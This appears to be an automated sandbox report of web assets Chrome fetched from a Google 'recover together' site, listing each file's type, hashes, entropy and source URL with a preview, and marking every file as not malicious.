                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1070
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):539
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.570016325311205
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XuMclOYQRUYEPuXiYMCeVhLbFL5iyJS1nU0H0M1Q8N2mFJ:XuMcxQRUYIYM5hLjoUC0MNFJ
                                                                                                                                                                                                                                                                                          MD5:4F1E2F30FF237825083F69AAA136778E
                                                                                                                                                                                                                                                                                          SHA1:15612AE8BD351CA32D10A341DB3932C8D1DFD587
                                                                                                                                                                                                                                                                                          SHA-256:AF14599FB250F5368180B462CAC4D2465AF3398DC0F4ABBAE4D9899FAAAC33D9
                                                                                                                                                                                                                                                                                          SHA-512:889CDBDC8C3BEBE56EC0DD16A5E08807BDB1E50843E20F923BDFFC8AC4FC2A329204EF9130E078CDF71D27C8646FAFF47EB1FAC797281FC509AD3B668B03EA47
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/icons/menu_close.svg
                                                                                                                                                                                                                                                                                          Preview:...........SMo.0...W..%.b.,.~.H....\.T.E.f.Z.W.M.}mc.Re.Z>.=o....c..d..Oq..../D.x..._7d......+4.R.........ZM....U.S.#....x.4.H....R.-..0x........T.w..a|..0.l6.zqv..J>..~...+!..n....2.bt...Mp...1>..Z...y.hi7...R*.....:.#O.].}..+(...vT^B.kB.1.-. ..Jp....rU.-.A0...F!/.P.z.Vl...wVA.W+..E.....B...`.W8K..vO.5N.%.-..'F..b.)..t"S.1.....&..h..t....S.../.I+.X..C=!J........,"=cv]!....e.e..{.]..Hz.J..4.>.....$3y.J..[..A.I..f.#.1J.=w..`nk.....~.Vh..LL......>....+...r...?76.|y./..X......B.!.{....V...]...../.........$.......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2193
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.886006777431829
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:z3+eER2BAiiHUAIDTPaWnduy5Vxs6WrfYXO6GCPKCN:zOVniEUAInSWdbfxs6W+OWN
                                                                                                                                                                                                                                                                                          MD5:F40674C5A955432A289B6C17A0C63353
                                                                                                                                                                                                                                                                                          SHA1:6741C1B919B163F4988D0888EE9388CDD0BEDA03
                                                                                                                                                                                                                                                                                          SHA-256:B874C167A6AD43F336EB0E15DFBB60B1274C5970DB96FDFBD28D6E02CC14A177
                                                                                                                                                                                                                                                                                          SHA-512:4E664FB4D70756D335453184CB4F44EA3948BEF8DEA8B93BA40B32D976832244A9E8EF8BAF78AE9FDB5AA10DD87A1377857B110979D4569AC96C5785485CA96C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/i/productlogos/google_search_round/v8/web-64dp/logo_google_search_round_color_1x_web_64dp.png
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...@...@......iq....XIDATx...p.j........[fff.r.3s..!.233..b8..d...w&q..e.r..;...w....#,Iu.C....N>C.Mf.k.\[..g.n..I...Q[~..H.vX.N.......>./...#u..md/.}.X.....5.>W.!......9.=g.z......H.....G~....%y...Y..uU@3....lT...$.H_d.[m..)%.6%......g.:y..S...U........'.I...e...E...`......Q.Q....1*...9s%.....>..*..dy2{:.1..Q.`..$".7-.].m..u........#...o.....`...p..K.............:U.!..r.....,..~x&..{..lt...X.y.H.l=..>|.f....<.l.?.r..Ep...tx6z.[/.m]....C...^.~.L......sp..n......... .k+. .j..!u..U..9.[tx.._.....O.......!......QQ..~.&p......?....-Z..I..........n....n..(.!......&<..?.)......{..B.].!|..D..>..^|T........ ......f.}.g........s..bl......<g...>......Q.\.4.......+c...:.;...c..Q{.;.-.).....8}....C........A.Hx..n.T.4%+^.6$@w...0.U..|........oF.s........z...4...p?..z0.Qv^TH.B.;........U!..Yc.....^.hR.WX..........;...=[U..-_...y...k...Oc../..N....V..Vh.n..1<k..........V.@9.[.j...e....B{..0.R..c..Y...?4...e.....D..}.?.@.X...*../8....@..h.`.7{.G.c
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 391 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):94168
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.990430094990128
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:Jj0BfmMD+HChd/PfDS4t7D+wutCYAFH1Ndas87t1415+9DKnagiX6zz1io3de8oF:0jYyXfDvtYCYAd1j670X+Unn9XB3w8o
                                                                                                                                                                                                                                                                                          MD5:B60555632ABAFCFEE17726F9937E3A65
                                                                                                                                                                                                                                                                                          SHA1:FC4F3BCF9742530B33183C5F6C1C152E9972DD4A
                                                                                                                                                                                                                                                                                          SHA-256:56AC594DD1C8FF75B249A4ED7F82B87CA4C6EF6CFFBF7D7710A8D22AA37709BB
                                                                                                                                                                                                                                                                                          SHA-512:57028D3C54A4AFFB1F2D8F662E41E6DD0ED9EE0B55554B97967843E61BD229CC243D684F19D42AA4567B43F3BF0B676C8BE09EDFD3489AE132EDDA938D0B0734
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............iC......sBIT....|.d... .IDATx..y.%Yz......{..].[UWuW.L.L.t.tK3...0.....6.e.Fl..O a...`.d.d...e@...a B`.HB.....k..Z_U....<..8..<K.{_.../.{..Y..7....}g.....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ...O.........mx.b......-..p'.p....q.P/Mv.Q.Y.3A..Bb.....`.....`.R. A.(@..@ %B@.A.@J...$.H)!.N..! ....0.P... X..,J.E).R......pq#.........?......}}......P...^K..O'I..a..R>...^.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (42672)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):381374
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.28698251444922
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:DFyGeyxWOuThBurw1Ynfq52cEHlzfaeBWyT:5yGiYaSlrD
                                                                                                                                                                                                                                                                                          MD5:EA765C6DD1ECA878E6CAB0F9C592EF5B
                                                                                                                                                                                                                                                                                          SHA1:9792A4CA433AA68EBD7235355B5828C99B0122B3
                                                                                                                                                                                                                                                                                          SHA-256:80529CFFCCCD43C429664BC3A2D29464B06A87DB29521E6EB8BB681FD842CE82
                                                                                                                                                                                                                                                                                          SHA-512:24DEDD7522AE3215DE77EEC55100090AE5D9CCFD127E68CB35D625AAE60D9D85955EA88E7403A1B01235F4CC2C4D63357168FA4D1057EC3CE06E65785653399F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){"use strict";function mobile(){return ios()||android()}function ios(){return/iPhone|iPad|iPod/i.test(navigator.userAgent)||ipad()}function android(){return/Android/i.test(navigator.userAgent)}function chrome(){return-1!==navigator.userAgent.indexOf("Chrome")&&!edge()}function safari(){return!chrome()&&-1!==navigator.userAgent.indexOf("Safari")&&!edge()}function ipad(){return-1!==navigator.userAgent.toLowerCase().indexOf("macintosh")&&Boolean(navigator.maxTouchPoints)&&navigator.maxTouchPoints>2}function edge(){return-1!==navigator.userAgent.indexOf("Edge")}function now(){return Date.now()}function timeDiffMs(t,e){return e-t}function debounce(t,e,i){let r;return function(...s){const a=this,n=()=>{r=void 0,t.apply(a,s)},o=()=>{r=void 0};i||void 0!==r||(r=+setTimeout(n,e)),i&&void 0===r&&(t.apply(a,s),r=+setTimeout(o,e))}}const getAllTrackedElements=(t=document)=>Array.from(t.querySelectorAll("*:not(a)[data-category][data-action][data-label]"));function findAnalyticsTargetElem
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1689), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1689
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.640520027557763
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:ifKf9wIe7P3SJgX4DW45JUzBG/t5JUTLF5Jv325Jvhv:5De7Pn4DW+Go3GnXdcHv
                                                                                                                                                                                                                                                                                          MD5:45DD7BD58C9F085DA52FA16A2A150066
                                                                                                                                                                                                                                                                                          SHA1:9B5CF4B288EDE14AE8834F3EF2A58145B8EC8CBC
                                                                                                                                                                                                                                                                                          SHA-256:0D5C53FCC37C7A2CE26367BBE6197FCD9272DD7EBC81823D088A4DFFF5AE599B
                                                                                                                                                                                                                                                                                          SHA-512:520B8DF68524C2CEF393B837D7EAD0168028C94697E1DA0AC4BDDAFAB849D1B26D7E7933082146AE6A220A449F066CBBBA2EBFC6CC30D3F756FBD98EE061C8DF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:var(--Nsm0ce);--izGsqb:var(--Nsm0ce);--todMNcl:var(--EpFNW);--p9J9c:var(--Nsm0ce)}:root{--KIZPne:#a3c9ff;--xPpiM:#001d35;--Ehh4mf:var(--Nsm0ce)}:root{--Yi4Nb:#d2d2d2;--pEa0Bc:#474747;--kloG3:#d2d2d2;--YaIeMb:#f7f8f9;--Pa8Wlb:#0b57d0;--izGsqb:#0b57d0;--todMNcl:#fff;--p9J9c:#0b57d0}.EpPYLd{display:block;position:relative}.YpcDnf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default}.LGiluc,.EpPYLd[disabled]{pointer-events:none;cursor:default}@media (forced-colors:active){.EpPYLd[disabled]{color:GrayText}}.LGiluc{border-top:1px solid;height:0;
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (8359)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):242285
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.549688575947958
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:/z5ax8eulMYeiTdG00RlXol0VQbQwM87A0WsEemtJeNk7LDE8:dpmF5lq0Ud7esEemveG7Xv
                                                                                                                                                                                                                                                                                          MD5:AA5DBA88892D2B90CD481DD0E83BE502
                                                                                                                                                                                                                                                                                          SHA1:2917A835F33D84FB663B3BA2B0BD467ECED112DE
                                                                                                                                                                                                                                                                                          SHA-256:0A6BFDA48349FDF6E0EE1682ABE5B366E126B8B9F0B1DEBE4A83AB1DAD77C126
                                                                                                                                                                                                                                                                                          SHA-512:B7A4CC1950FB3475289DE917D94745274264722C840AD5472F32687B973FC280246FBADB0D45460D4C8B744F49484E2E4B9465CC53859BCE17B0B6D0F0BF1C7B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-NKJW98V
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__j","vtp_name":"navigator.userAgent"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",2],"vtp_name":"originalLocation"},{"function":"__u","convert_case_to":1,"vtp_component":"QUERY","vtp_queryKey":"utm_source","vtp_customUrlSource":["macro",3],"vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":["template",["macro",1],":",["macro",4]]},{"function":"__dbg"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":"G-W46717PY19"},{"function":"__c","vtp_value":"recovertogether\\.withgoogle\\..*"},{"function":"__c","vtp_value":"G-W467
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 314 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):67119
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.980414935902374
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:6qlLM1QUaq+A+vwfvHpf0/ccYXNEfzRijJGQas1PChj:XlLMOU9+A+vwKnHRQdR1PChj
                                                                                                                                                                                                                                                                                          MD5:C4D2236D4D9FD5652314C24B22EF37AE
                                                                                                                                                                                                                                                                                          SHA1:06794845E2BDED4F550CEFFD229EA9DE27FD990A
                                                                                                                                                                                                                                                                                          SHA-256:628CC4F4963845D41CB3913C581F3A8E0841E64A86222A94CD3B157E1DBA95D2
                                                                                                                                                                                                                                                                                          SHA-512:E5136E98219CE71DA580D06025EED5B339AA260EADC9ED58C3AD9CBD73446B72FDA78707BDEE1804892D49761CC62D47D35EBE0501E63F9272AEFC7D00A96507
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:..........K......sBIT....|.d... .IDATx..y.]Gq/.[{....h.k.,K...!..........Bl .../..$.|..{.KHx!......1...C..`F.`.... .-...eIg......R..U.kK..a...o......_Uu...$.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%..IR..f ._.j4.k..?....Lt:.J...0...rA....>. H.a...L&..v..T*.....r.~._.f.G'''w.A"....J$..0.}.^..v...z+.,M.R.A.. .aX.....a)....B....Y.. ...R.y.A.D.....0.... ....... ....A........A.4.4.4.0l.a...`6..c.^.P>.....8.3.<m...........~....7.r...Ngs... X.J.J...&.0.H.R.l6.`.l..l....s.=.C.Pr.%>...y..G.......`..L...0....J.v.Ap_..zp.M;N...w.....v..ya..g.r..a.n.... ...(.A0...D>..8 Y...8(=.]F.~t.."..}..C...Ap<..j...R..A.....{....3.<.....c.m..:.zbK./0...e.....3.l..pM..E..L..N......./..$......S..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):676328
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.1830637730488045
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:d69uT/7mT7p5pHGKeTF7/xB+sBIgJq0Xt6Yl7mLohCIFVw:d6w7AN5BGhTF7xB+vCRFgTM
                                                                                                                                                                                                                                                                                          MD5:E43BD53BE90D9FAD3ACADEC0F2E1EBB5
                                                                                                                                                                                                                                                                                          SHA1:B8ADBC0300C44E9CE4939995A655722CD95C1138
                                                                                                                                                                                                                                                                                          SHA-256:ED9DF024A58D11B9B18814FA20375A4F9CA8A0F5B4441991245CE417B2AD4671
                                                                                                                                                                                                                                                                                          SHA-512:C91CC027B87A5936CDEE8277A2D9A2D94D4F5E9AE235C678BCDA9D1F994B0844A44E0B04ADDFDCEDD7D6EFC04BB130924C3277E8899A015CBAA09A51AE400771
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/Kkh1J0HrlRSnxSQrtnP4DFSMb4SI7Rz0yAT0G6ku1QOARBJJ4To-rDzu0tfCOMWvNCtYvCYaM92ISqiDPr-8KtwNqYO3xuJERwASsfn2=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF.Q..WEBPVP8L.Q../..D..u!...R...?..?.D...C(dZ......j...kkO#.....c..x ..g...NC.t....p..#....j..'.$I.g..f...C.XV=...=.!.m;.:(..H@.....A%.(.:H.|.....<....2b.H.,3...........W{..*..E.HKrB.*.i;L"u.}.e..Yd.c.*.L.ok6eV7...,....g.D..n.EYn.....Z.m..P.L;....I..*.U.....?@.b[..:G.d.%I....f.L.Y..L...........fv..k....}........fBl.b.ghiB9h..9M.c..}.u.{.{..7.-.T.Cy.%......."....~_>....?;.=...;H{0..IeMj.X...m...T.......`..6.....<"^...m..u.EQbI.l..v..{...D..n.1+...'36`%........i.@...........l.,FB..&.Y.".8i.c.F....$...aI..k)Z.........J..S.....m'.6...1.....r..f....k.c.j..\[...13.F.,.C.H.......[E..V.!.o.B.-.2..!.A..h..R....}.y<p..................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1518)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):269484
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.481173643062106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:t5R+/rLk07byKtxMaQTdpJfb3N5PZ3BiS3Zw5oluv3sfaBOCtwHr1DFCx6:R+/XkkGKtQTdp1N/Bl34OuPQCOC+VFCM
                                                                                                                                                                                                                                                                                          MD5:0B51953A796E17B4D9C4223E9D5AFBD6
                                                                                                                                                                                                                                                                                          SHA1:014B3894888F2288222C1AC4698123CF32649FBC
                                                                                                                                                                                                                                                                                          SHA-256:FA80771F7624B00C94526022A986CA657521400C5A9E7A32A09D2628F7DF2FCA
                                                                                                                                                                                                                                                                                          SHA-512:AEA4CC24AD434A4D5F6917B604D23BCF10E258A062A73C6D07CA1204A548DCA5F6F666AF3B2AFE08CC2682AF35E2B581F15F868E429F32F924242F92979E7427
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.eh1Y-00lhsg.es5.O/ck=boq-one-google.OneGoogleWidgetUi.hnwCoQrxzwQ.L.B1.O/am=IEAwYGw/d=1/exm=_b,_tp/excm=_b,_tp,calloutview/ed=1/wt=2/ujg=1/rs=AM-SdHtG5mpbAvjw6lx2uzOrYGtSsP2slQ/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=ws9Tlc,n73qwf,GkRiKb,e5qFLc,IZT63,UUJqVe,O1Gjze,byfTOb,lsjVmc,xUdipf,OTA3Ae,A1yn5d,fKUV3e,aurFic,Ug7Xab,ZwDk9d,V3dDOb,mI3LFb,yYB61,O6y8ed,PrPYRd,MpJwZc,LEikZe,NwH0H,OmgaI,lazG7b,XVMNvd,L1AAkb,KUM7Z,Mlhmy,s39S4,lwddkf,gychg,w9hDv,EEDORb,RMhBfe,SdcwHb,aW3pY,pw70Gc,EFQ78c,Ulmmrd,ZfAoz,mdR7q,wmnU7d,xQtZb,JNoxi,kWgXee,MI6k7c,kjKdXe,BVgquf,QIhFr,ovKuLd,hKSk3e,yDVVkb,hc6Ubd,SpsfSb,ebZ3mb,Z5uLle,MdUzUe,ZDZcre,zbML3c,A7fCU,zr1jrb,Uas9Hd,pjICDe"
                                                                                                                                                                                                                                                                                          Preview:"use strict";_F_installCss(".KL4X6e{background:#eee;bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.TuA45b{opacity:.8}sentinel{}");.this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.Tz=function(a,b,c,d,e,f,g){var h=(0,_.Md)(a.ta);_.Dc(h);a=_.ne(a,h,c,b,2,f,!0);c=d!=null?d:new c;if(g&&(typeof e!=="number"||e<0||e>a.length))throw Error();e!=void 0?a.splice(e,g,c):a.push(c);(0,_.Bc)(c.ta)&2?(0,_.Yk)(a,8):(0,_.Yk)(a,16)};_.Vz=function(a){if(a instanceof _.Uz)return a.j;throw Error("w");};_.Wz=function(a){return new _.Uz(_.La,a[0].toLowerCase())};._.Xz=function(a,b,c,d){if(a.length===0)throw Error("w");a=a.map(function(f){return _.Vz(f)});var e=c.toLowerCase();if(a.every(function(f){return e.indexOf(f)!==0}))throw Error("ga`"+c);b.setAttribute(c,d)};_.bt.prototype.kc=_.ca(28,function(){return this.rb.length==0?null:new _.M(this.rb[0])});_.M.prototype.kc=_.ca(27,function(){return this});_.bt.prototype.Ia=_.ca(26,function(){retur
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3139
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.907844644588579
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:8CpSIcChBhZsygjP6wiEGcARMiJTMen+q4:RL3hZzQPnipx+1
                                                                                                                                                                                                                                                                                          MD5:F62B4957F65F29E46564BD51E5AC0278
                                                                                                                                                                                                                                                                                          SHA1:28EEE6F2BE6E1A22D9ED37427AE9AD6721BF03DD
                                                                                                                                                                                                                                                                                          SHA-256:AF72C980D9EFE0EEEFF612F729B78FEB2DDBFA0948C4E21FF3E52166A692C058
                                                                                                                                                                                                                                                                                          SHA-512:E3CE13B5A22EDD6E8FEA71138C46DCD0A9924F34197AB033E02634B771C0F98713D192048EA098ADEE39FA5552E40EF0F7BF4D591B68F2E02157317543C98590
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....IDATx..m.\Wy....{.....;...:-..!A..-U.F.^'.P..@...qc...U..(.*U.UP?.8q.UT.&B. ....RH...;..'q(i..?.;s?.=.13.....;...}..V3.9..3.y....k-%...:..t)..8.....<.8Iw._Bm.";.....-....>..N`.0@....-.{..{....S.(..........h.....Sm...~..U.%.F.U.*.p.y..?....X..Oo.Q|,s .....tr..Cl.N........!.+,Z.o...l:Qp.O.8..'..~.*....V......L.<..wVc.(.zq.3.....D.a.;..F..M...F.a..\...k....XX."/.rM.l~.3.FK...nM.O.......,..9D...o&...C...\..k...R....W.pM....<0J..c.......s...#.....U..)..X...fM...y+..v^........Y......s...\.l.[...b...Rp...Vc)..le...\\nh...\l...xl...tOc.1..../..A....$L.\...3X{?....D.3;'}....u..2.#.....ZI.<x...9......~O......E..?....@..{.4..].....gO}..c8..:..3p....o..g~.......)[O..;>..C.3.(.i...`.../?.?*X.{.g9$.n.%[:I.!....<....m.B.D..Wt.%..M..Nd.MoYf<8|.q.r.SH..H.-xg..d.w[.Y<..E.r...L.P.ToI$.7i.DV1.-..y..h.X..O..d...{...`..z.^.L..UL.......x....6..n..'8x.....V..`....+Y.!...,.9....D.......].x..c.....[...{X....3.G>..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7408)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):470274
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.617914553375893
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:TEm15efBVSGhiHJ4tN1kbYC5NTKee0ZWnAO+:4mUPhgJSkbr5NO0ZA6
                                                                                                                                                                                                                                                                                          MD5:AC7B1A2B3BE7AB20F714950F593F5C9B
                                                                                                                                                                                                                                                                                          SHA1:BC9EE0BB5ECDB6C9AF1A4C3632C339BC169349A6
                                                                                                                                                                                                                                                                                          SHA-256:1A447175B589C97FE31013DFF85254E96D371A9BD04CC04B0C9A742ADF727C5F
                                                                                                                                                                                                                                                                                          SHA-512:32404E4517C0D7E7502C4B229AF4943D3B5BBC29CDE8D8C4E97B1C5DDB21CAE8ABDC43114AA98C54A4037B851665B5EF2830EFBF41C7387CD18FBBC89E2EE2B3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:_F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{animation:qli-container-rotate 1568.2352941176ms linear infinite}@keyframes qli-container-rotate{from{transform:rotate(0)}to{transform:rotate(1turn)}}.RoKmhb{height:100%;opacity:0;position:absolute;width:100%}.nNMuOd .VQdeab{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-yellow-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .FlKbCe{animation:qli
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1766x1720, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):175132
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998934116147253
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:0oJ5HBklRgqDdw3RnqT4GQHdDm7TSw7NRfWK36v7taTb6ssUr4xrMklx73:0oJ5H2PDdctqT4nHN89Ox5LMklx3
                                                                                                                                                                                                                                                                                          MD5:7A01ED14A44CE07935FFC1C2318DD96A
                                                                                                                                                                                                                                                                                          SHA1:BB96B6D37E2D73E48CB92E69555B08A8F76ADF7B
